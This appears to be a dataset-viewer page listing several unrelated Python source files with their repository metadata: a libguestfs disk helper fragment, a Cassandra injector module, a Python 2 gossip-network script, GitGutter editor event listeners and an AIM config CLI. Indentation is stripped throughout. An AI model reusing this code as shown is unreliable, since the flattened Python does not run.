try:
try:
self.mount_all()
if w_append:
self.g.write_append(file_name, content)
else:
self.g.write(file_name, content)
except Exception:
raise exceptions.TestError("write '%s' to file '%s' error!"
% (content, file_name))
finally:
self.umount_all()
def replace_image_file_content(self, file_name, find_con, rep_con):
"""
replace file content matches in the file with rep_con.
support using Regular expression
:param file_name: the file you want to replace
:param find_con: the original content you want to replace.
:param rep_con: the replace content you want.
"""
try:
self.mount_all()
file_content = self.g.cat(file_name)
if file_content:
file_content_after_replace = re.sub(find_con, rep_con,
file_content)
if file_content != file_content_after_replace:
self.g.write(file_name, file_content_after_replace)
else:
err_msg = "Can't read file '%s', check is it exist?"
raise exceptions.TestError(err_msg % file_name)
finally:
self.umount_all()
def close(self):
"""
Explicitly close the guestfs handle.
"""
if self.g:
self.g.close()
|
lmr/avocado-vt
|
virttest/utils_disk.py
|
Python
|
gpl-2.0
| 21,332 | 0.000281 |
from injector import Module
from cassandra.cqlengine import connection
from cassandra.cluster import Cluster
from cassandra.cqlengine.management import create_keyspace_simple, sync_table, sync_type
from cassandra.cqlengine.usertype import UserType
from ...entities.track_type import TrackType
from cassandra_users_repository import CassandraUsersRepository
from cassandra_spots_repository import CassandraSpotsRepository
from runs.cassandra_runs_repository import CassandraRunsRepository
from cassandra_checkpoint_passes_repository import CassandraCheckpointPassesRepository
from ..repositories_definitions import UsersRepository
from ..repositories_definitions import SpotsRepository
from ..repositories_definitions import RunsRepository
from ..repositories_definitions import CheckpointPassesRepository
class CassandraRepositoriesModule(Module):
def configure(self, binder):
connection.setup(['cassandrahost'], 'biketimer', protocol_version=4)
cluster = Cluster(['cassandrahost'])
session = cluster.connect('biketimer')
users_repository_instance = CassandraUsersRepository(cluster, session)
binder.bind(UsersRepository, to=users_repository_instance)
spots_repository_instance = CassandraSpotsRepository(cluster, session)
binder.bind(SpotsRepository, to=spots_repository_instance)
runs_repository_instance = CassandraRunsRepository(cluster, session)
binder.bind(RunsRepository, to=runs_repository_instance)
checkpoint_passes_repository_instance = CassandraCheckpointPassesRepository(cluster, session)
binder.bind(CheckpointPassesRepository, to=checkpoint_passes_repository_instance)
|
jacekdalkowski/bike-timer
|
web-api/biketimerwebapi/db/repositories/cassandra/cassandra_repositories_module.py
|
Python
|
apache-2.0
| 1,685 | 0.005935 |
import sys, math
# **************** Main program *********************************************
def main():
# File IO ###############################################
txt = open("in9.txt", 'r')
N = int (txt.readline())
n = 2 * N
a = [[0 for x in range(1)] for y in range(n)]
# print >> sys.stderr, a
print >> sys.stderr, "N=", N
for line in range (0, N):
x , y = [int(j) for j in txt.readline().split()]
#print >> sys.stderr, '%d %d' % (x, y)
m, n = sortTwo(x, y)
a[m].append(n)
a[n].append(m)
a[m][0] += 1
a[n][0] += 1
print >> sys.stderr, "Done file IO \n \n"
##############################################################
# Init vars-------------------------------------------------
#print >> sys.stderr, a
while (a[-1]==[0]): # check for abundant [0]
a.pop()
relationship = a
n = len(relationship)
print >> sys.stderr, "total nodes:" , n
level = [0] * n # contains level of nodes
# print >> sys.stderr, level
#print >> sys.stderr, "relationship: \n" , relationship
countOne = 0
oneList = []
for elem in range(0, n):
if (relationship[elem][0] == 1):
countOne += 1
oneList.append(elem)
print >> sys.stderr, "countONe:", countOne
# print >> sys.stderr,"oneList:", oneList
print >> sys.stderr, "Done Var init \n \n"
# -------------------------------------------------------------
# Engine ---------------------------------------------------
for i in range(0, countOne):
node = oneList[i]
level[i] = findSingleMaxLength(node, node, oneList, countOne, relationship, n)
# ------------------------------------------------------------
# Report -------------------------------------------------
#---------------------------------------------------------
# No touch area ------------------------------------------
maxi = max(level)
if (maxi % 2 == 0):
ans = maxi / 2
else:
ans = (maxi + 1) / 2
print >> sys.stderr, "Answer:", ans
#*********************** End program ************************************************
def spreadRumorNode(node, relationship, relationship_len): # update relationship and provide bag
bag = []
new_relationship = relationship
if (new_relationship[node][0] > 0):
for bag_elem in range (1, 1 + relationship[node][0]):
node_child = relationship[node][bag_elem]
if (relationship[node_child][0] > 0):
bag.append(node_child)
new_relationship[node][0] = -2
return bag, new_relationship
def spreadRumorOnce(target_list, relationship, relationship_len):
new_target_list = []
new_relationship = relationship
number_of_target = len(target_list)
target_bag = [[] for y in range(number_of_target)]
for i in range(number_of_target):
node = target_list[i]
target_bag[i], new_relationship = spreadRumorNode(node, new_relationship, relationship_len)
new_target_list.extend(target_bag[i])
return new_target_list, new_relationship
def findSingleMaxLength(x, x_pos, oneList, oneList_len, relationship, relationship_len):
new_relationship = relationship
step = -1
try:
i = oneList.index(x)
except ValueError:
return -1 # no match
nowhere_to_go = 0
target_list = [x]
while (nowhere_to_go == 0):
step += 1
target_list, new_relationship = spreadRumorOnce(target_list, new_relationship, relationship_len)
if (target_list == []):
nowhere_to_go = 1
return step
def findMin(a, b):
res = a
if (res > b):
res = b
return res
def sortTwo(a, b):
if (a < b):
x = a
y = b
else:
x = b
y = a
return x, y
main()
|
dannyp11/gossip_network
|
main_v2.py
|
Python
|
gpl-2.0
| 4,267 | 0.023904 |
import time
import sublime
import sublime_plugin
ST3 = int(sublime.version()) >= 3000
if ST3:
from .view_collection import ViewCollection
from .git_gutter_popup import show_diff_popup
else:
from view_collection import ViewCollection
from git_gutter_popup import show_diff_popup
def async_event_listener(EventListener):
if ST3:
async_methods = set([
'on_new',
'on_clone',
'on_load',
'on_pre_save',
'on_post_save',
'on_modified',
'on_selection_modified',
'on_activated',
'on_deactivated',
])
for attr_name in dir(EventListener):
if attr_name in async_methods:
attr = getattr(EventListener, attr_name)
setattr(EventListener, attr_name + '_async', attr)
delattr(EventListener, attr_name)
return EventListener
@async_event_listener
class GitGutterEvents(sublime_plugin.EventListener):
def __init__(self):
self._settings_loaded = False
self.latest_keypresses = {}
# Synchronous
def on_modified(self, view):
if self.settings_loaded() and self.live_mode:
self.debounce(view, 'modified', ViewCollection.add)
def on_clone(self, view):
if self.settings_loaded():
self.debounce(view, 'clone', ViewCollection.add)
def on_post_save(self, view):
if self.settings_loaded():
self.debounce(view, 'post-save', ViewCollection.add)
def on_load(self, view):
if self.settings_loaded() and self.live_mode:
self.debounce(view, 'load', ViewCollection.add)
def on_activated(self, view):
if self.settings_loaded() and self.focus_change_mode:
self.debounce(view, 'activated', ViewCollection.add)
def on_hover(self, view, point, hover_zone):
if hover_zone != sublime.HOVER_GUTTER:
return
# don't let the popup flicker / fight with other packages
if view.is_popup_visible():
return
if not settings.get("enable_hover_diff_popup"):
return
show_diff_popup(view, point, flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY)
# Asynchronous
def debounce(self, view, event_type, func):
if self.non_blocking:
key = (event_type, view.file_name())
this_keypress = time.time()
self.latest_keypresses[key] = this_keypress
def callback():
latest_keypress = self.latest_keypresses.get(key, None)
if this_keypress == latest_keypress:
func(view)
if ST3:
set_timeout = sublime.set_timeout_async
else:
set_timeout = sublime.set_timeout
set_timeout(callback, settings.get("debounce_delay"))
else:
func(view)
# Settings
def settings_loaded(self):
if settings and not self._settings_loaded:
self._settings_loaded = self.load_settings()
return self._settings_loaded
def load_settings(self):
self.live_mode = settings.get('live_mode')
if self.live_mode is None:
self.live_mode = True
self.focus_change_mode = settings.get('focus_change_mode')
if self.focus_change_mode is None:
self.focus_change_mode = True
self.non_blocking = settings.get('non_blocking')
if self.non_blocking is None:
self.non_blocking = True
return True
settings = {}
def plugin_loaded():
global settings
settings = sublime.load_settings('GitGutter.sublime-settings')
if not ST3:
plugin_loaded()
|
natecavanaugh/GitGutter
|
git_gutter_events.py
|
Python
|
mit
| 3,715 | 0.000538 |
# Copyright (c) 2016 Cisco Systems
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import click
from aim import config as aim_cfg
from aim import context
from aim.db import api
from aim.tools.cli.groups import aimcli
@aimcli.aim.group(name='config')
@click.pass_context
def config(ctx):
aim_ctx = context.AimContext(store=api.get_store(expire_on_commit=True))
ctx.obj['manager'] = aim_cfg.ConfigManager(aim_ctx, '')
@config.command(name='update')
@click.argument('host', required=False)
@click.pass_context
def update(ctx, host):
"""Current database version."""
host = host or ''
ctx.obj['manager'].to_db(ctx.obj['conf'], host=host)
@config.command(name='replace')
@click.argument('host', required=False)
@click.pass_context
def replace(ctx, host):
"""Used for upgrading database."""
host = host or ''
ctx.obj['manager'].replace_all(ctx.obj['conf'], host=host)
|
noironetworks/aci-integration-module
|
aim/tools/cli/commands/config.py
|
Python
|
apache-2.0
| 1,450 | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.